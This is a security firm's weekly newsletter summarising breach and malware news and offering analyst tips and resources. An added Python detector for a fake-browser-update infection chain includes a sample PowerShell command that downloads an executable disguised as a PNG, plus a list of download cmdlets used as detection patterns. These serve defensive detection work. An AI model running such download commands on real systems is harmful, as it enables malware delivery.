Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
Story #1: Ticketmaster and Santander Bank Tied Up in Snowflake Breach
Snowflake Inc., a cloud storage provider, is facing allegations of a data breach impacting clients like Ticketmaster and Santander Bank.
Top Takeaways:
- Hackers from the ShinyHunters group claimed to have stolen personal data from 560 million Ticketmaster customers and 30 million Santander customers.
- Hudson Rock, a research firm, initially reported that hackers breached Snowflake’s system using a Snowflake employee’s ServiceNow account with stolen credentials.
- Snowflake denied that its products were the source of the breach and stated that no vulnerability within its systems led to the data access.
- The company acknowledged that a former employee’s demo account was accessed but claimed it contained no sensitive data and that there is no pathway for customer credentials to be accessed from Snowflake’s production environment.
- Santander confirmed an incident involving customer information but assured that no transactional data or credentials were compromised.
- Live Nation, the parent company of Ticketmaster, has confirmed a data breach involving unauthorized access to a third-party cloud database believed to be Snowflake. Over 560 million Ticketmaster users’ data, including personal details and event information, may have been exposed, with data appearing on the dark web for sale.
- The situation is ongoing, with Snowflake investigating increased cyber threat activity and the veracity of ShinyHunters’ claims remaining unverified.
Story #2: TikTok Fixes Zero-Day Vulnerability Used for Account Hijacking
High-profile TikTok accounts of companies and celebrities were hijacked due to a zero-day vulnerability in the direct messages feature.
Top 4 takeaways:
- The exploit allowed attackers to gain control of accounts by having the targets open a malicious message, without needing to download anything or click links.
- TikTok’s security team has intervened to stop the attack and is working to restore access to affected accounts. The exact number of compromised accounts has not been disclosed.
- TikTok has a history of vulnerabilities, including one discovered by Microsoft in August 2022 that allowed account takeovers with a single tap.
- TikTok surpassed 1 billion users in September 2021 and has over 1 billion downloads on Google’s Play Store and 17 million ratings on the iOS App Store, making it a prime target for hackers worldwide.
Story #3: Several London Hospitals Impacted by Ransomware Attack
Synnovis, a pathology and diagnostic services provider for the NHS, was hit by a ransomware attack on June 3, impacting healthcare services at several major hospitals in London.
Top 3 takeaways:
- The attack has caused significant disruptions, particularly affecting blood transfusions, leading to cancellations and redirections of clinical activities.
- Among the impacted are King’s College Hospital, Guy’s Hospital, St Thomas’ Hospital, Royal Brompton Hospital, and Evelina London Children’s Hospital.
- Emergency care remains available, and efforts are underway to understand the full impact with support from the National Cyber Security Centre and Cyber Operations team.
Story #4: Chinese Hacking Groups Team Up to Perform Coordinated Attacks
Chinese state-sponsored hackers have been teaming up to target a Southeast Asian government agency in a cyberespionage operation dubbed the Crimson Palace campaign.
Top 4 takeaways:
- Identified as Cluster Alpha (STAC1248), Cluster Bravo (STAC1807), and Cluster Charlie (STAC1305), each group has distinct tactics for network disruption, lateral movement, and persistent access management.
- The groups have deployed ‘EAGERBEE,’ ‘CCoreDoor,’ and ‘PocoProxy’ malware, along with techniques like DLL side-loading, living-off-the-land binaries, and credential interception. They have also used custom malware variants during coordinated attacks.
- The existence of separate actors with parallel objectives suggests they are acting under a central authority, despite challenges in high-confidence attribution.
- The groups have targeted this agency since at least March 2023. Sophos is continuing to monitor the campaign.
Story #5: Fake Browser Updates Deliver Malware
Cybersecurity firm eSentire reports that fake web browser updates are being used to distribute BitRAT and Lumma Stealer malware.
Top Takeaways:
- The attack begins when users visit compromised websites that redirect them to a fake update page, prompting them to download a ZIP file containing the malware.
- The ZIP file includes a JavaScript file that executes PowerShell scripts to download additional payloads, including the malware, disguised as PNG image files.
- The same .NET-based loader is used to deploy both BitRAT and Lumma Stealer, suggesting it’s sold as a “malware delivery service.”
- BitRAT allows attackers to harvest data, mine cryptocurrency, and control infected hosts remotely. Lumma Stealer, available since August 2022, captures information from web browsers and crypto wallets, along with other sensitive data. It has been one of the most prevalent information stealers, with a significant increase in logs for sale from Q3 to Q4 2023.
- Attackers commonly use fake updates to infiltrate systems. Users must remain vigilant against fake updates and cybercriminals’ evolving tactics for distributing malware.
- Stay safe online by being cautious of unexpected update prompts and verifying the authenticity of any downloads.
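The chain above (script host runs the JavaScript from the ZIP, which launches PowerShell to fetch payloads disguised as PNG images) leaves a distinctive parent/child and command-line pattern in process-creation telemetry. The following detector is an added illustration written for this newsletter, not code from eSentire or from the campaign report; the Sysmon-like line layout and the sample events are constructed, and the hostnames and `.invalid` URLs are placeholders.

```python
"""Score process-creation events for the fake-browser-update chain:
a Windows script host (wscript/cscript) spawning PowerShell that downloads
a file whose URL ends in an image extension. Added defensive example;
the log format and sample lines below are constructed, not real telemetry."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Hypothetical flattened Sysmon Event ID 1 layout; adapt to your SIEM's field names.
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+ParentImage=(?P<parent>\S+)\s+"
    r"Image=(?P<image>\S+)\s+CommandLine=(?P<cmd>.*)$"
)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # what runs the dropped .js file
SHELLS = {"powershell.exe", "pwsh.exe"}
# cmdlets / .NET members commonly used to pull a second stage
DOWNLOAD_CUE = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer", re.I)
# URL whose path ends in an image extension: the "payload disguised as PNG" trick
IMAGE_URL = re.compile(r"""https?://[^\s'"]+?\.(?:png|jpe?g|gif|bmp)\b""", re.I)


@dataclass
class ProcessEvent:
    ts: str
    host: str
    parent_image: str
    image: str
    command_line: str


def parse_line(line: str) -> Optional[ProcessEvent]:
    m = LINE_RE.match(line)
    if not m:
        return None
    return ProcessEvent(m["ts"], m["host"], m["parent"], m["image"], m["cmd"])


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> Tuple[str, List[str]]:
    """Return (severity, reasons). Only PowerShell children are scored."""
    if basename(ev.image) not in SHELLS:
        return "none", []
    from_script_host = basename(ev.parent_image) in SCRIPT_HOSTS
    downloads = bool(DOWNLOAD_CUE.search(ev.command_line))
    image_urls = IMAGE_URL.findall(ev.command_line) if downloads else []
    reasons = []
    if from_script_host:
        reasons.append("PowerShell spawned by Windows script host")
    if downloads:
        reasons.append("download primitive in command line")
    if image_urls:
        reasons.append(f"fetches URL with image extension: {image_urls[0]}")
    if from_script_host and image_urls:
        severity = "high"        # full chain from the report
    elif from_script_host or image_urls:
        severity = "medium"      # one strong indicator
    elif downloads:
        severity = "low"         # ordinary download, worth a look at volume
    else:
        severity = "none"
    return severity, reasons


def scan(lines: List[str]) -> List[dict]:
    """Parse each line and return only events scored above 'none'."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        sev, reasons = score_event(ev)
        if sev != "none":
            findings.append({"ts": ev.ts, "host": ev.host,
                             "severity": sev, "reasons": reasons})
    return findings


# Constructed sample events (not real logs); hosts and URLs are placeholders.
SAMPLE_LOG = [
    r'2024-06-04T10:12:03Z host=WS-12 ParentImage=C:\Windows\System32\wscript.exe '
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine=powershell -nop -w hidden -c "iwr http://update.example.invalid/assets/logo.png -OutFile $env:TEMP\svc.exe"',
    r'2024-06-04T10:15:40Z host=WS-07 ParentImage=C:\Windows\explorer.exe '
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine=powershell -c Get-ChildItem C:\Users',
    r'2024-06-04T10:20:11Z host=WS-03 ParentImage=C:\Windows\System32\cmd.exe '
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine=powershell Invoke-WebRequest http://intranet.example.invalid/tools/agent.msi -OutFile agent.msi',
    r'2024-06-04T10:31:55Z host=WS-12 ParentImage=C:\Windows\System32\cscript.exe '
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine=powershell -c Start-Sleep 1',
    r'2024-06-04T10:33:02Z host=WS-12 ParentImage=C:\Windows\System32\wscript.exe '
    r'Image=C:\Windows\System32\cmd.exe CommandLine=cmd /c echo hi',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"].upper(), f["ts"], f["host"], "; ".join(f["reasons"]))
```

Run against the sample, the first event (script host, PowerShell, image-extension download) scores high, the plain `Invoke-WebRequest` of an `.msi` scores low, and the script-host-spawned PowerShell with no download scores medium; the benign `Get-ChildItem` and the `cmd.exe` child are not reported. Tune `DOWNLOAD_CUE` and the parent list to your own baseline rather than alerting on every PowerShell launch.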
Top Tips of the Week
Threat Intelligence
- Utilize CTI in incident response tabletop exercises. Simulate scenarios to enhance readiness and coordination.
- Regularly assess and update CTI processes. Ensure they align with the evolving threat landscape and organizational objectives.
- Consider the psychological aspect of CTI analysis. Understand threat actor motivations for more effective countermeasures.
Threat Hunting
- Conduct threat intelligence exercises. Simulate scenarios to test readiness and identify areas for improvement.
- Foster threat intelligence skills in-house. Develop a culture of continuous learning to keep your team’s skills up to date.
Custom Tooling
- Create custom tools with user-friendly interfaces. Enhance usability to encourage widespread adoption and effective utilization.
- Follow coding standards in custom tool development. Consistent coding practices enhance readability and maintainability.
Feature Article
Estimative language is a cornerstone of any good cyber threat intelligence report. It allows analysts to make clear, precise, and transparent assessments about the likelihood of an outcome or event so key stakeholders can make informed decisions. Without it, the lines between judgment and fact become blurred.
This guide will teach you what you need to start using estimative language in your threat intelligence reports and accurately assign a confidence level to your assessments. You will learn what estimative language is, its importance, and its three main components.
I will also share practical advice on using estimative language in the real world so you can begin implementing it today. Let’s jump straight in and start using estimative language!
Learning Resources
Splunk vs Datadog: Which SIEM Is Best?
Splunk and Datadog are two top-quality SIEM solutions available today. But which is better for your use case? Discover the answer in this head-to-head comparison of features, performance, and usability. Let’s begin!
Cognitive Bias in Cyber Threat Intelligence
Discover how cognitive bias can impact your work as a cyber threat intelligence analyst in this great presentation by Riana Freeman. She highlights the importance of recognizing and countering these biases to improve decision-making.
Detection Engineering with Wade Wells
Learn about detection engineering, cyber threat intelligence, and public speaking in this insightful interview between Wade Wells and Gerald Auger. The pair discuss Wade’s journey into cyber, what he would do differently, and the importance of detection engineering.
Learn How to Use OBS
If you are a remote worker, you need a good camera and microphone setup to communicate effectively with your team. This OBS masterclass will teach you how to do just that by optimizing your web camera’s image quality and showcasing various presenting techniques.
Personal Notes
🤔 This week at Kraven has been a refine and improve week. We have tracked, mapped, and recorded all our key business processes to find areas to improve or optimize. This includes everything from client onboarding to research and content creation. To deliver the most value possible to our clients we need to be as streamlined and efficient as possible, and to ensure this, we hold weeks like this every month or so.
We have also been focusing on expanding our repertoire of free blog articles with a new series on CTI biases and threat intelligence collection sources, so be on the lookout for those in the coming months. Please reach out if you want to see us cover other CTI topics.